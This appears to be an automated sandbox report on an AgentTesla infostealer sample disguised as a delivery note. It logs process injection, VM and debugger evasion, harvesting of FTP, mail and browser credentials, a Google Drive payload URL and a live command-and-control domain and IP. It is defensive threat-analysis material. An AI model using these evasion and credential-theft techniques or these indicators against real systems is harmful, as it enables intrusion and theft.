            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\Delivery note_241493.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Delivery note_241493.exe, 00000001.00000002.4961626569.0000000002280000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Source: Delivery note_241493.exe, 00000001.00000002.4961626569.0000000002280000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9672547573.00000000007D0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exe, 00000003.00000002.9672547573.00000000007D0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1JLAICUMNY0PV111DLBQNPRN9DPE5OBKC
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4724Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9951Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeSystem information queried: ModuleInformationJump to behavior
            Source: Delivery note_241493.exe, 00000001.00000002.4963600548.0000000004CE9000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Delivery note_241493.exe, 00000001.00000002.4963600548.0000000004CE9000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: Delivery note_241493.exe, 00000001.00000002.4963600548.0000000004CE9000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Delivery note_241493.exe, 00000001.00000002.4961626569.0000000002280000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: RegAsm.exe, 00000003.00000002.9672547573.00000000007D0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc
            Source: Delivery note_241493.exe, 00000001.00000002.4963600548.0000000004CE9000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Delivery note_241493.exe, 00000001.00000002.4963600548.0000000004CE9000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: RegAsm.exe, 00000003.00000002.9673580519.000000000090F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: Delivery note_241493.exe, 00000001.00000002.4961626569.0000000002280000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9672547573.00000000007D0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: RegAsm.exe, 00000003.00000002.9673055792.00000000008A8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW=
            Source: Delivery note_241493.exe, 00000001.00000002.4963600548.0000000004CE9000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Delivery note_241493.exe, 00000001.00000002.4963600548.0000000004CE9000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Delivery note_241493.exe, 00000001.00000002.4963600548.0000000004CE9000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: RegAsm.exe, 00000003.00000002.9676419596.0000000002359000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\Delivery note_241493.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00106948 KiUserExceptionDispatcher,LdrInitializeThunk,3_2_00106948
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Delivery note_241493.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 560000Jump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe' Jump to behavior
            Source: RegAsm.exe, 00000003.00000002.9675924399.0000000000F00000.00000002.00020000.sdmp, UserOOBEBroker.exe, 0000000D.00000002.9673291997.000001CEC13C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000003.00000002.9675924399.0000000000F00000.00000002.00020000.sdmp, UserOOBEBroker.exe, 0000000D.00000002.9673291997.000001CEC13C0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000003.00000002.9675924399.0000000000F00000.00000002.00020000.sdmp, UserOOBEBroker.exe, 0000000D.00000002.9673291997.000001CEC13C0000.00000002.00020000.sdmpBinary or memory string: Program ManagerP
            Source: RegAsm.exe, 00000003.00000002.9675924399.0000000000F00000.00000002.00020000.sdmp, UserOOBEBroker.exe, 0000000D.00000002.9673291997.000001CEC13C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4276, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4276, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4276, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Delivery note_241493.exe26%VirustotalBrowse
            Delivery note_241493.exe11%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            csavarcsapagyexpress.hu0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.microso0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            http://RoaOsk.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://Z7Bm0DNVgOa.net0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            csavarcsapagyexpress.hu
            185.111.89.226
            truetrueunknown
            drive.google.com
            172.217.168.46
            truefalse
              high
              googlehosted.l.googleusercontent.com
              172.217.18.97
              truefalse
                high
                doc-14-9g-docs.googleusercontent.com
                unknown
                unknownfalse
                  high
                  mail.csavarcsapagyexpress.hu
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0l7hc8l5m01jjthf5v4et0b93qf3oibd/1634136825000/12448148553778765603/*/1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc?e=downloadfalse
                      high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://schemas.microsoUserOOBEBroker.exe, 0000000D.00000002.9671840658.000001CEC0D20000.00000002.00020000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://doc-14-9g-docs.googleusercontent.com/RegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmpfalse
                        high
                        https://doc-14-9g-docs.googleusercontent.com/FyRegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmpfalse
                          high
                          https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0l7hc8l5RegAsm.exe, 00000003.00000003.4933970506.000000000091F000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000003.4934338593.0000000000969000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9673580519.000000000090F000.00000004.00000020.sdmpfalse
                            high
                            http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://DynDns.comDynDNSRegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://sectigo.com/CPS0RegAsm.exe, 00000003.00000002.9685947858.000000001D747000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://RoaOsk.comRegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://drive.google.com/RegAsm.exe, 00000003.00000002.9673055792.00000000008A8000.00000004.00000020.sdmpfalse
                              high
                              http://Z7Bm0DNVgOa.netRegAsm.exe, 00000003.00000002.9685744051.000000001D731000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9686201568.000000001D773000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              172.217.168.46
                              drive.google.comUnited States
                              15169GOOGLEUSfalse
                              185.111.89.226
                              csavarcsapagyexpress.huHungary
                              51013WEBSUPPORT-SRO-SK-ASSKtrue
                              172.217.18.97
                              googlehosted.l.googleusercontent.comUnited States
                              15169GOOGLEUSfalse

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:1646
                              Start date:13.10.2021
                              Start time:16:52:25
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 12m 42s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:Delivery note_241493.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:19
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.evad.winEXE@5/1@3/3
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 87
                              • Number of non-executed functions: 8
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe
                              • Excluded IPs from analysis (whitelisted): 51.105.236.244, 20.82.207.122, 20.82.210.154, 92.123.195.73, 92.123.195.35
                              • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, arc.trafficmanager.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, a1449.dscg2.akamai.net, wd-prod-cp.trafficmanager.net, arc.msn.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              16:54:59API Interceptor2772x Sleep call for process: RegAsm.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              185.111.89.226Delivery note_241493.exeGet hashmaliciousBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                WEBSUPPORT-SRO-SK-ASSKDelivery note_241493.exeGet hashmaliciousBrowse
                                • 185.111.89.226
                                M2021-D-074.exeGet hashmaliciousBrowse
                                • 37.9.175.26
                                Purchase Order.exeGet hashmaliciousBrowse
                                • 185.111.90.24
